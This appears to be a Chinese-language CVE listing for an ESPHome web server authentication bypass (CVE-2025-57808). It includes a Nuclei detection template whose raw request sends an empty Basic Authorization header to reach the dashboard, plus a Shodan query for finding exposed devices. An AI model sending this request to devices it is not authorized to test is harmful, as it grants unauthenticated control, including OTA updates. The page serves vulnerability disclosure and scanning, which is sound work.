CVE-2025-57808: ESPHome - Authentication Bypass

日期: 2025-08-01 | 影响软件: ESPHome | POC: 已公开

漏洞描述

ESPHome 2025.8.0 contains an authentication bypass caused by improper validation of base64-encoded Authorization values in the web_server component, letting attackers access functionality without valid credentials, exploit requires crafted Authorization header.

PoC代码[已公开]

id: CVE-2025-57808

info:
  name: ESPHome - Authentication Bypass
  author: sean-kim
  severity: high
  description: |
    ESPHome 2025.8.0 contains an authentication bypass caused by improper validation of base64-encoded Authorization values in the web_server component, letting attackers access functionality without valid credentials, exploit requires crafted Authorization header.
  impact: |
    Attackers can bypass authentication to access web server functions, including OTA updates, potentially compromising device control.
  remediation: |
    Upgrade to version 2025.8.1 or later.
  reference:
    - https://cybersecuritynews.com/esphome-web-server-authentication-bypass/
    - https://github.com/esphome/esphome/security/advisories/GHSA-mxh2-ccgj-8635
    - https://esphome.io/components/web_server/
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.title:"ESPHome"
  tags: cve,cve2025,auth-bypass,esphome,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 401'
        internal: true

  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Dashboard - ESPHome")'
        condition: and
# digest: 4a0a00473045022100882c4e867c008f42836432002eaf1dfdc8861fd742ba030c2cc3bbe4ddd6b38a0220412d8f8f0b7c6011810a4ff53404b0734edc02a2dcd544a8a7633de597dcb33b:922c64590222798bb761d5b6d8e72950

相关漏洞推荐